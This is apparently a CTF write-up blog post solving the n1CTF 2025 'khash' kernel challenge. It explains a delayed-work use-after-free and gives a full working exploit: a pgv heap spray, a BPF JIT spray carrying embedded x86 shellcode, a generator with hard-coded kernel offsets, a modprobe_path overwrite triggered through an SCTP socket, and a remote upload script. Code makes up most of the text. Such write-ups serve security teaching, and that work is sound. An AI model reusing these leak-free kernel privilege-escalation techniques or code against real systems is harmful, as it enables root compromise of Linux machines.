Published 2025-11-02 · Updated 2025-11-03 · WriteUp · 17 min read (about 2522 words)

Use BPFJIT to solve khash from n1CTF 2025

Exploit a kernel UAF without leaking any address.

In short…

n1khash has a delayed-work UAF, and the freed object contains a vtable.
We use a pgv spray to reclaim the freed slot in kmalloc-256.
We fill the pgv-backed pages with 0xffffffffc1000000 - 0x800, an address inside our sprayed BPF JIT code that acts as a kernel one-gadget.
Wait for the delayed work to run and win; no leak is needed.

The vulnerability

When /dev/n1khash is opened, the module allocates a control structure in the generic kmalloc-256 cache, without any isolation:

khash can schedule delayed work. When the work runs, it invokes two function pointers from a vtable inside the control structure (both vtable[0] and vtable[1] are called):

To queue a delayed work item, we use the 0x4010B110 ioctl:
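The ioctl number can be decoded with the generic Linux ioctl bit layout. The sketch below is a minimal illustration, assuming the asm-generic layout used on x86-64; `ioc_decode`, `struct ioc_fields` and `kh_pack_count` are hypothetical helpers, and the `struct kh_queue_req` layout is the one the exploit uses, not something read from the module source.

```c
#include <assert.h>
#include <stdint.h>

/* Generic Linux ioctl number layout (asm-generic, used by x86-64):
 * bits 31-30 direction, 29-16 argument size, 15-8 type, 7-0 number. */
struct ioc_fields {
  unsigned dir, size, type, nr;
};

static struct ioc_fields ioc_decode(uint32_t cmd) {
  struct ioc_fields f = {
    .dir  = (cmd >> 30) & 0x3,    /* 1 = _IOC_WRITE: userspace -> kernel */
    .size = (cmd >> 16) & 0x3fff, /* sizeof() of the argument */
    .type = (cmd >> 8) & 0xff,
    .nr   = cmd & 0xff,
  };
  return f;
}

/* Request layout as used by the exploit (assumed, not from module source). */
struct kh_queue_req {
  uint64_t digest_ptr;
  uint64_t count; /* hi 32 bits: delay in ms, lo 32 bits: size in bytes */
};

/* Pack delay and size the same way the exploit builds req.count. */
static uint64_t kh_pack_count(uint32_t delay_ms, uint32_t size) {
  return ((uint64_t)delay_ms << 32) | size;
}
```

With these fields, 0x4010B110 is what `_IOW(0xB1, 0x10, struct kh_queue_req)` produces: a write-direction request with a 16-byte argument. The exploit's `count` packs a 1000 ms delay with a 0x100-byte size, which gives the window for closing the fd before the work fires.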

If we close the fd before the delayed work runs, the control structure is freed, and when the work eventually executes it fetches the vtable from a freed kmalloc-256 chunk.

Exploit plan

At this point we already have two free control-flow hijack (CFH) primitives.

I discussed what can be done with a pure CFH in my previous writeup about corCTF, but most of those techniques (relying on panic_on_oops being disabled, RetSpill, NPerm, or regular stack pivoting) require at least a kernel .text leak to perform ROP.

However, this challenge does not enable KVM when booting the kernel, so bypassing KASLR with a hardware side channel is not trivial.

We could certainly reverse the khash module further to look for a good info leak, but I decided to go straight to Ret2BPF, which does not need any leak.

Thanks to the challenge author for providing the Kconfig, which let us quickly confirm that BPF_JIT is enabled (so nice not to have to guess the kernel config over and over again).
We can also see that STATIC_USERMODE_HELPER is not set (when it is set, every usermode-helper call is routed through one fixed binary), so the shellcode can stay simple: it only needs to overwrite modprobe_path or core_pattern instead of performing a ret2usr or a task_struct search.

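Also note that unprivileged_bpf_disabled is irrelevant to the cBPF spray in Ret2BPF: that sysctl only restricts the bpf(2) syscall, while classic BPF filters are attached with setsockopt(SO_ATTACH_FILTER) and still get JIT-compiled, so we do not need to care about it.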

Exploit! Exploit! Exploit!

Before triggering the CFH, we need an object in kmalloc-256 whose field at offset 0x28 is a pointer to data we control.

I chose the pgv array as the candidate: it is an elastic array in which every element is a pointer to memory that is shared with, and fully controlled by, userspace.


struct pgv {
	char *buffer;  // points to a kernel-user shared memory
};  // allocated as array with GFP_KERNEL

By reclaiming the freed khash control structure with a pgv[32] array (32 × 8 = 256 bytes, so it lands in kmalloc-256), we control the vtable pointer and therefore the function pointers, without any info leak.
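The overlap can be modeled in userspace to check the arithmetic. This is a sketch, not kernel code: `fake_pages`, `simulate_reclaim` and `vtable_slot` are hypothetical names, a 64-bit host is assumed, and the only fact taken about the control structure is that its vtable pointer sits at offset 0x28.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PGV_NUM    32   /* 32 * sizeof(struct pgv) = 256 -> kmalloc-256 */
#define VTABLE_OFF 0x28 /* vtable pointer offset in the khash control structure */
#define JIT_TARGET (0xffffffffc1000000ULL - 0x800)

struct pgv { char *buffer; }; /* same layout as the kernel's struct pgv */

/* Userspace stand-ins for the ring-buffer pages (512 qwords = 4 KiB each). */
static uint64_t fake_pages[PGV_NUM][512];

/* Index of the pgv element that overlaps the vtable pointer. */
static size_t vtable_slot(void) { return VTABLE_OFF / sizeof(struct pgv); }

/* Model of the reclaim: the kernel fills pgv[] with page pointers, the exploit
 * writes JIT_TARGET into the first qword of every page via its mmap()ed view,
 * and the delayed work later treats the same 256 bytes as its control struct. */
static uint64_t simulate_reclaim(struct pgv pgv[PGV_NUM]) {
  for (int i = 0; i < PGV_NUM; i++) {
    pgv[i].buffer = (char *)fake_pages[i];
    fake_pages[i][0] = JIT_TARGET;
  }
  const uint64_t *vtable; /* "ctrl->vtable", read from offset 0x28 */
  memcpy(&vtable, (const char *)pgv + VTABLE_OFF, sizeof(vtable));
  return vtable[0];       /* the first function pointer the work calls */
}
```

So `pgv[5].buffer` takes the place of the vtable pointer, and `vtable[0]` is whatever the exploit wrote into the first qword of that page, which is why `spray_pgv_thread` writes the target into the first qword of every page.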

Then the only thing left is to spray cBPF programs to get a large area of JIT-compiled native code. The allocation address of BPF JIT code is highly predictable, so if we spray enough (0x600 programs of 0x900 instructions each in this exploit), a fixed address will almost certainly fall inside our code.

By simply setting the function pointer to 0xffffffffc1000000 - 0x800, we can jump to the middle of our sprayed BPF JITed code.
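A back-of-the-envelope check of why 0x600 programs should be enough. It assumes that each `A = k` becomes a 5-byte `mov eax, imm32`, and that JIT images are handed out roughly bottom-up starting at 0xffffffffc0000000 (the x86-64 module area); it ignores prologues, epilogues, allocator rounding, any randomized offset, and anything else living in that region. The macro and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define NPROGS     (0x30 * 0x20) /* fork_limit * filters per child = 0x600 */
#define PROG_LEN   0x900         /* cBPF instructions per filter */
#define LD_IMM_LEN 5             /* mov eax, imm32 = b8 + 4 immediate bytes */
#define AREA_START 0xffffffffc0000000ULL           /* ASSUMPTION: module/JIT area start */
#define JIT_TARGET (0xffffffffc1000000ULL - 0x800) /* hard-coded jump target */

/* Rough size of the sprayed JIT code (per-program overhead ignored). */
static uint64_t spray_bytes(void) {
  return (uint64_t)NPROGS * PROG_LEN * LD_IMM_LEN;
}

/* Distance from the assumed area start to the jump target. */
static uint64_t target_offset(void) {
  return JIT_TARGET - AREA_START;
}
```

Under these assumptions the spray produces about 0x10E0000 bytes (roughly 17 MB) of constant-carrying code, a bit more than the 0xFFF800-byte distance to the target.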

You can find more details about Ret2BPF in the original writeup and recent discussion.

Since x86 uses variable-length instructions, we can spray LOAD CONSTANT instructions that embed arbitrary 32-bit constants (BPF JIT hardening, i.e. constant blinding, is not enabled here). Jumping into the middle of those constants tricks the CPU into interpreting them as our shellcode.

The original Ret2BPF uses 0xb3909090 as the NOP sled constant. Each LOAD CONSTANT is JIT-compiled to mov eax, imm32, i.e. b8 90 90 90 b3, so a run of them entered at any misaligned offset decodes as .. 90 90 90 b3 b8 90 90 90 b3 b8 .., where b3 b8 is mov bl, 0xb8.

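At the end of the sled we place the actual privilege-escalation shellcode, one instruction of at most 3 bytes per constant. The generator pads each instruction to 3 bytes with 0x90 and uses 0x3c as the fourth byte, so that 3c b8 (cmp al, 0xb8) swallows the b8 opcode of the next mov.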
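To see why any misaligned entry point converges onto the shellcode, here is a toy model in C. It is a sketch under stated assumptions: `insn_len` is a hypothetical length decoder that only knows the handful of opcodes in this example (it is not a real x86 decoder), and the single payload instruction `48 01 c2` (`add rdx, rax`) stands in for the generated shellcode, packed with the trailing 0x3c the same way gen.py does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* JIT output of one cBPF "A = k": mov eax, imm32 = b8 + k (little endian). */
static size_t emit_ld_imm(uint8_t *out, uint32_t k) {
  out[0] = 0xb8;
  for (int i = 0; i < 4; i++)
    out[1 + i] = (uint8_t)(k >> (8 * i));
  return 5;
}

/* Toy length decoder: only the opcodes that appear in this example. */
static int insn_len(uint8_t op) {
  switch (op) {
  case 0x90: return 1; /* nop */
  case 0xb3: return 2; /* mov bl, imm8: swallows the following b8 */
  case 0x3c: return 2; /* cmp al, imm8: swallows the following b8 */
  case 0xb8: return 5; /* mov eax, imm32 */
  case 0x48: return 3; /* REX.W op modrm (register form), e.g. add rdx, rax */
  default:   return -1;
  }
}

/* Decode linearly from `entry`; return 1 if an instruction starts at `want`. */
static int decodes_at(const uint8_t *code, size_t len, size_t entry, size_t want) {
  size_t pc = entry;
  while (pc < len) {
    if (pc == want)
      return 1;
    int n = insn_len(code[pc]);
    if (n < 0 || pc + (size_t)n > len)
      return 0;
    pc += (size_t)n;
  }
  return 0;
}

/* Eight sled constants, one payload constant (0x3cc20148 = 48 01 c2 3c),
 * one trailing sled constant. *payload receives the payload's start offset. */
static size_t build_demo(uint8_t code[50], size_t *payload) {
  size_t len = 0;
  for (int i = 0; i < 8; i++)
    len += emit_ld_imm(code + len, 0xb3909090);
  *payload = len + 1; /* skip the b8 opcode of the payload's mov */
  len += emit_ld_imm(code + len, 0x3cc20148);
  len += emit_ld_imm(code + len, 0xb3909090);
  return len;
}
```

In this model, entering on an instruction boundary (offset 0) executes every constant as a plain `mov eax, imm32` and never reaches the payload, while every other offset inside the sled converges onto it, and the trailing `3c b8` hands control to the next constant.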

So the main logic of the exploit is:

int main() {
  init();

  bpf_jit_spray();  // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
  puts("BPF JIT spray done.");

  if (fork() == 0) {  // setup ns and ready for pgv spray
    spray_pgv_thread();
  }

  int dev = SYSCHK(open(DEV_PATH, O_RDWR | O_CLOEXEC));
  uint8_t buf[0x100];
  memset(buf, 0x41, sizeof(buf));

  struct kh_queue_req req = {
      .digest_ptr = (uint64_t)(uintptr_t)buf,
      .count = ((uint64_t)1000 << 32) | 0x100
  };
  SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

  close(dev);  // free the control block 
  write(cmd_pipe_req[1], void_buf, 1);  // reclaim it with pgv[32] array
  read(cmd_pipe_reply[0], void_buf, 1);
  puts("pgv spray done");

  while (check_modprobe() == 0)
    sleep(1);
  puts("Win !!");
  system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/2\n/bin/chmod 777 /tmp/2\n'>/tmp/1");
  system("chmod +x /tmp/1");
  socket(AF_INET, SOCK_STREAM, 132);  // 132 = IPPROTO_SCTP: the kernel calls request_module(), which runs modprobe_path as root
  system("cat /tmp/2");
}

The full exploit code can be found at the end of this writeup.

Misc notes

modprobe_path

This commit (around Linux 6.2) removed the binfmt module autoloading, so executing a file with an unknown binary format no longer invokes modprobe. However, some unprivileged syscalls can still make the kernel request a module that is compiled but not loaded by default, for example:

socket(AF_INET, SOCK_STREAM, 132);  // 132 = IPPROTO_SCTP

This trick has also been discussed and studied in depth in SyzBridge.
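To illustrate which module request the socket() call triggers: as I understand `inet_create()`, when no handler is registered for the requested protocol it first asks `request_module()` for `net-pf-%d-proto-%d-type-%d` and then for `net-pf-%d-proto-%d`, and `request_module()` runs the binary named by modprobe_path. The helper below (`inet_module_alias` is a hypothetical name) only reproduces the first alias string; it does not load anything.

```c
#include <assert.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* Build the first module alias inet_create() requests for an unknown
 * (type, protocol) pair in the PF_INET family. */
static void inet_module_alias(char *buf, size_t n, int type, int protocol) {
  snprintf(buf, n, "net-pf-%d-proto-%d-type-%d", PF_INET, protocol, type);
}
```

For the call above this yields `net-pf-2-proto-132-type-1`; as long as SCTP is built as a module and not yet loaded, the request reaches the overwritten modprobe_path.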

Shellcode

The original copy_from_user shellcode is good enough here, but for more complex operations we can clear the WP bit in CR0, copy a longer shellcode from user memory into kernel executable memory, and jump to it.

End of the Trail

After all those merciless 48h CTF events, it's sweet to have a 24h CTF and enjoy the rest of the weekend at the beach 🥰

Full exploit code

#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/timerfd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define SYSCHK(x)                 \
  ({                              \
    typeof(x) __res = (x);        \
    if (__res == (typeof(x))-1)   \
      err(1, "SYSCHK(" #x ")");   \
    __res;                        \
  })

/* =========================== pgv spray ===========================  */
#include <sys/socket.h>
#include <net/if.h>
#include <netpacket/packet.h>  
#include <net/ethernet.h> 
#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8)
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create an isolate namespace for pgv */
void unshare_setup(void) {
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

struct tpacket_req3 {
	unsigned int	tp_block_size;	/* Minimal size of contiguous block */
	unsigned int	tp_block_nr;	/* Number of blocks */
	unsigned int	tp_frame_size;	/* Size of frame */
	unsigned int	tp_frame_nr;	/* Total number of frames */
	unsigned int	tp_retire_blk_tov; /* timeout in msecs */
	unsigned int	tp_sizeof_priv; /* offset to private data area */
	unsigned int	tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);
    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
    return s;
}

char void_buf[1] = {0};
void spray_pgv_thread() {
  unshare_setup();
  read(cmd_pipe_req[0], void_buf, 1); 
  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
        pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
  }

  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
    if (!pgfd[i])
        continue;
    pgaddr[i] = SYSCHK(mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, pgfd[i], 0));
    for (int j = 0; j < PAGE_NUM; j++) {
        unsigned long *pgv_buff = pgaddr[i] + j * 0x1000;
        pgv_buff[0] = 0xffffffffc1000000 - 0x800;
    }
  }
  write(cmd_pipe_reply[1], void_buf, 1);
  
  sleep(999);
  exit(0);
}
/* =========================== pgv spray ===========================  */

/* ========================= BPF JIT spray =========================  */
struct sock_filter filter[0x1000];
char buf[0x1000];
void bpf_jit_spray(void) {
  
  char *shellcode = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE | 
                                  PROT_EXEC, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
  strcpy(shellcode, "/tmp/1");

  int stopfd[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));
  
  unsigned int prog_len = 0x900;  // In current environment, the max instructions in a program is near 0x900
  struct sock_filter table[] = {
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},  // NOP-sled constant; entered misaligned, "b3 b8" decodes as mov bl, 0xb8
    {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}
  };

  for (int i = 0; i < prog_len; i++) {
    filter[i] = table[0];
  }

  filter[prog_len - 1] = table[1];
  int idx = prog_len - 2;

#include "sc.h"

  struct sock_fprog prog = {
    .len = prog_len,
    .filter = filter,
  };
  
  int fd[2];
  int fork_limit = 0x30;
  for (int k = 0; k < fork_limit; k++) {
    if (fork() == 0) {
      close(stopfd[1]);  // use fork to bypass RLIMIT_NOFILE limit.
      for (int i = 0; i < 0x20; i++) {
        SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
        SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
      }
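      write(stopfd[0], buf, 1);  // tell the parent this child has finished spraying
      read(stopfd[0], buf, 1);   // block forever so the filters (and their JIT code) stay alive
      exit(0);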
    }
  }
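  /* wait for all forks to finish spraying BPF code; a stream read may return fewer bytes than requested */
  for (int got = 0; got < fork_limit;) {
    ssize_t n = SYSCHK(read(stopfd[1], buf, fork_limit - got));
    if (n == 0)
      errx(1, "spray children exited early");
    got += n;
  }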
}

int check_modprobe() {
  char buf[0x100] = {};
  int modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
  read(modprobe, buf, sizeof(buf));
  printf("modprobe: %20s\n", buf);
  close(modprobe);
  char* old = "/sbin/modprobe";
  return strncmp(buf, old, strlen(old)) != 0;
}
/* ========================= BPF JIT spray =========================  */

#define DEV_PATH "/dev/n1khash"
#define KH_IOCTL_QUEUE 0x4010B110

struct kh_queue_req {
  uint64_t digest_ptr; // user buffer pointer (if used by driver)
  uint64_t count;      // hi: delay (ms), lo: size (bytes, 16-byte aligned, <= 0x1000)
};

void init() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  pipe(cmd_pipe_req);
  pipe(cmd_pipe_reply);
  // pin_on_cpu(0);
  
  struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
  setrlimit(RLIMIT_NOFILE, &rlim);

  // Ignore SIGPIPE
  signal(SIGPIPE, SIG_IGN);
}

int main() {
  init();

  bpf_jit_spray();  // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
  puts("BPF JIT spray done.");

  if (fork() == 0) {  // setup ns and ready for pgv spray
    spray_pgv_thread();
  }

  int dev = SYSCHK(open(DEV_PATH, O_RDWR | O_CLOEXEC));
  uint8_t buf[0x100];
  memset(buf, 0x41, sizeof(buf));

  struct kh_queue_req req = {
      .digest_ptr = (uint64_t)(uintptr_t)buf,
      .count = ((uint64_t)1000 << 32) | 0x100
  };
  SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

  close(dev);  // free the control block 
  write(cmd_pipe_req[1], void_buf, 1);  // reclaim it with pgv[32] array
  read(cmd_pipe_reply[0], void_buf, 1);
  puts("pgv spray done");

  while (check_modprobe() == 0)
    sleep(1);
  puts("Win !!");
  system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag\n' > /tmp/1");
  system("chmod +x /tmp/1");
  socket(AF_INET, SOCK_STREAM, 132);  // 132 = IPPROTO_SCTP: the kernel calls request_module(), which runs modprobe_path as root
  system("cat /tmp/flag");
}

Generate sc.h with the following Python script (run as gen.py by the remote helper below):

#!/usr/bin/env python3

from pwn import *
import struct

entry_syscall = 0xffffffff82800080  # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val):  # emit asm for _reg -= _val; |_val| (< 2**32) is rebuilt byte by byte in esi
    ins = ["sub", "add"]
    return f'''
xor esi,esi
mov sil, {(abs(_val) >> 24) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 16) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 8) & 0xff}
shl esi, 8
mov sil, {(abs(_val)) & 0xff}    
{ins[_val < 0]} {_reg}, rsi
'''


ASM = f"""
; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64; ECX should be MSR_LSTAR ( 0xc0000082 )
xor edx, edx    
mov cl, 0xc0    
shl ecx, 24    
mov cl, 0x82    
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32    
shl rdx, cl    
add rdx, rax  
; modprobe_path = entry_SYSCALL_64 - off1
; move modprobe_path to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx    
; call copy_from_user(modprobe_path, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi    
mov sil, 0xa0    
shl esi, 16    
xor edx, edx    
mov dl, 0x30    
push rax
call rax
pop rax
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg )  
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep(0x7000000 ms, about 32.6 h) parks the kworker; better than spinning forever with jmp $+0


with open("sc.h", "w") as f:
    for a in ASM.strip().split("\n")[::-1]:
        if a.strip() == '' or a[0] == ';':
            continue
        cur = asm(a)
        assert len(cur) <= 3
        cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
        sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
        print(sc)
        f.write(sc + "\n")
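The generator never needs a KASLR leak because it only encodes differences between symbols: assuming (as on mainline x86-64) that KASLR shifts the whole kernel image by a single slide, `rdmsr(MSR_LSTAR)` yields the runtime `entry_SYSCALL_64` and every other address follows by a fixed offset. The C model below replays that arithmetic as a sketch; `load_reg` mirrors the Python helper of the same name, `resolve` is a hypothetical name, and the addresses are the nokaslr values from the script.

```c
#include <assert.h>
#include <stdint.h>

/* nokaslr addresses from the gen.py script */
#define ENTRY_SYSCALL_64 0xffffffff82800080ULL
#define MODPROBE_PATH    0xffffffff84194620ULL
#define COPY_FROM_USER   0xffffffff81b6ffa0ULL
#define MSLEEP           0xffffffff81271380ULL

/* Model of load_reg(): rebuild |val| in esi one byte at a time
 * (xor esi,esi; mov sil,b3; shl esi,8; ... mov sil,b0), then reg -= val
 * via "sub reg, rsi" or "add reg, rsi" depending on the sign. */
static uint64_t load_reg(uint64_t reg, int64_t val) {
  uint32_t mag = (uint32_t)(val < 0 ? -val : val); /* |val| must fit in 32 bits */
  uint32_t esi = 0;
  for (int shift = 24; shift >= 0; shift -= 8) {
    esi = (esi & ~0xffu) | ((mag >> shift) & 0xff); /* mov sil, byte */
    if (shift != 0)
      esi <<= 8;                                     /* shl esi, 8 */
  }
  uint64_t rsi = esi; /* 32-bit register writes zero-extend into rsi */
  return val < 0 ? reg + rsi : reg - rsi;
}

/* Walk the shellcode's chain from a runtime entry_SYSCALL_64 (MSR_LSTAR)
 * to runtime modprobe_path, copy_from_user and msleep. */
static void resolve(uint64_t lstar, uint64_t out[3]) {
  int64_t off1 = (int64_t)(ENTRY_SYSCALL_64 - MODPROBE_PATH);
  int64_t off2 = (int64_t)(MODPROBE_PATH - COPY_FROM_USER);
  int64_t off3 = (int64_t)(COPY_FROM_USER - MSLEEP);
  uint64_t rdx = load_reg(lstar, off1); /* rdx = modprobe_path */
  out[0] = rdx;
  rdx = load_reg(rdx, off2);            /* rdx = copy_from_user */
  out[1] = rdx;
  out[2] = load_reg(rdx, off3);         /* rax = msleep */
}
```

Feeding it the runtime `entry_SYSCALL_64` under any slide returns the equally slid `modprobe_path`, `copy_from_user` and `msleep`, which is all the shellcode needs.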

Interacting with the remote:

import os, base64, gzip
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/tmp"
SEP = b"bash-5.2$ "


os.system("python3 gen.py")
os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
    f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
    exp = base64.b64encode(f.read())

# p = remote("60.205.163.215", 42675)
p = process(['./run.sh'])

print(p.recvuntil(SEP).decode())
for i in range(0, len(exp), 0x200):
    p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
    p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
p.interactive()


https://ghostfrankwu.github.io/2025/11/02/2025n1/

Author: Frank Wu
